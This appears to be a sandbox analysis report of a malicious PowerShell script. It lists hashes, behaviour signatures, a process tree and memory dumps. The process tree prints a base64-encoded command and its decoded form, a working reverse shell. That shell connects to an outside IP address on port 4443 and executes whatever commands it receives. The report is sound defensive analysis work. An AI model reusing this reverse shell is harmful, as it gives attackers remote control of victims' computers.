8d88ae22dc0c9ba278d7231f01276a6eb740b1c85c4fb11188c9b3164fd7add2

General

Target

conf.ps1
Size

1KB
MD5

0f90fbaf92f07116aff5dccd2d63d082
SHA1

958e20247d81d07ce09bffbb649d5ee172539d2f
SHA256

8d88ae22dc0c9ba278d7231f01276a6eb740b1c85c4fb11188c9b3164fd7add2
SHA512

9a586633290e323e2d0c66aba285a3e5ca4b8d03699efd9e71336a5a4067cad7c4bd305fd02647eec7ea214c83b18a3b2789ee92ccf08aa4222fa22d8b034b20

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

10 1604 powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4056 powershell.exe
4056 powershell.exe
4184 powershell.exe
4184 powershell.exe
1604 powershell.exe
1604 powershell.exe

flow	pid	process
10	1604	powershell.exe

pid	process
4056	powershell.exe
4056	powershell.exe
4184	powershell.exe
4184	powershell.exe
1604	powershell.exe
1604	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exewhoami.exe

description	pid	process
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	852	whoami.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4056 wrote to memory of 4184	4056	powershell.exe	powershell.exe
PID 4056 wrote to memory of 4184	4056	powershell.exe	powershell.exe
PID 4184 wrote to memory of 1604	4184	powershell.exe	powershell.exe
PID 4184 wrote to memory of 1604	4184	powershell.exe	powershell.exe
PID 1604 wrote to memory of 852	1604	powershell.exe	whoami.exe
PID 1604 wrote to memory of 852	1604	powershell.exe	whoami.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\conf.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -e UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAUABTAEgATwBNAEUAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAewAkAFQAQwBQAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADMALgAxADQAOQAuADEAMgA5AC4AMgA1ADEAJwAsACAANAA0ADQAMwApADsAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtACAAPQAgACQAVABDAFAAQwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQApADsAZgB1AG4AYwB0AGkAbwBuACAAVwByAGkAdABlAFQAbwBTAHQAcgBlAGEAbQAgACgAJABTAHQAcgBpAG4AZwApACAAewBbAGIAeQB0AGUAWwBdAF0AJABzAGMAcgBpAHAAdAA6AEIAdQBmAGYAZQByACAAPQAgADAALgAuACQAVABDAFAAQwBsAGkAZQBuAHQALgBSAGUAYwBlAGkAdgBlAEIAdQBmAGYAZQByAFMAaQB6AGUAIAB8ACAAJQAgAHsAMAB9ADsAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAUwB0AHIAaQBuAGcAKQA7ACQAUwB0AHIAZQBhAG0AVwByAGkAdABlAHIALgBGAGwAdQBzAGgAKAApAH0AVwByAGkAdABlAFQAbwBTAHQAcgBlAGEAbQAgACcAJwA7AHcAaABpAGwAZQAoACgAJABCAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABCAHUAZgBmAGUAcgAsACAAMAAsACAAJABCAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAKQAgAC0AZwB0ACAAMAApACAAewAkAEMAbwBtAG0AYQBuAGQAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEIAdQBmAGYAZQByACwAIAAwACwAIAAkAEIAeQB0AGUAcwBSAGUAYQBkACAALQAgADEAKQA7ACQATwB1AHQAcAB1AHQAIAA9ACAAdAByAHkAIAB7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAQwBvAG0AbQBhAG4AZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwB9ACAAYwBhAHQAYwBoACAAewAkAF8AIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwB9AFcAcgBpAHQAZQBUAG8AUwB0AHIAZQBhAG0AIAAoACQATwB1AHQAcAB1AHQAKQB9ACQAUwB0AHIAZQBhAG0AVwByAGkAdABlAHIALgBDAGwAbwBzAGUAKAApAH0AIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TCPClient = New-Object Net.Sockets.TCPClient('193.149.129.251', 4443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String);$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:852

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
e3490516e3b9cd180257ff374fbee2ee

SHA1
e5e1af70c373b9d302533d8f226b42b0e6df67c1

SHA256
9c5f7a563fa995eec0bf22a95e5b79fbbab6a63fc4ca2956397b4e57967ce14a

SHA512
21a720f4c9bbf718146da8cdcecbb06a746b5eeed0389c452ea8aea278d8fb18c4237a5413b63bd2d551e6dfffa01b0453a28731a36c9f80433cb035864fb8cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0gk4rghy.yc0.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1604-47-0x0000023E35690000-0x0000023E356A0000-memory.dmp

Filesize
64KB

Download
memory/1604-46-0x0000023E35690000-0x0000023E356A0000-memory.dmp

Filesize
64KB

Download
memory/1604-45-0x00007FFAAEA70000-0x00007FFAAF531000-memory.dmp

Filesize
10.8MB

Download
memory/1604-34-0x0000023E35690000-0x0000023E356A0000-memory.dmp

Filesize
64KB

Download
memory/1604-33-0x0000023E35690000-0x0000023E356A0000-memory.dmp

Filesize
64KB

Download
memory/1604-32-0x00007FFAAEA70000-0x00007FFAAF531000-memory.dmp

Filesize
10.8MB

Download
memory/4056-12-0x0000025B07920000-0x0000025B07930000-memory.dmp

Filesize
64KB

Download
memory/4056-31-0x00007FFAAEA70000-0x00007FFAAF531000-memory.dmp

Filesize
10.8MB

Download
memory/4056-11-0x0000025B07920000-0x0000025B07930000-memory.dmp

Filesize
64KB

Download
memory/4056-9-0x0000025B208E0000-0x0000025B20902000-memory.dmp

Filesize
136KB

Download
memory/4056-10-0x00007FFAAEA70000-0x00007FFAAF531000-memory.dmp

Filesize
10.8MB

Download
memory/4184-27-0x00007FFAAEA70000-0x00007FFAAF531000-memory.dmp

Filesize
10.8MB

Download
memory/4184-24-0x0000020870C90000-0x0000020870CA0000-memory.dmp

Filesize
64KB

Download
memory/4184-23-0x0000020870C90000-0x0000020870CA0000-memory.dmp

Filesize
64KB

Download
memory/4184-22-0x00007FFAAEA70000-0x00007FFAAF531000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing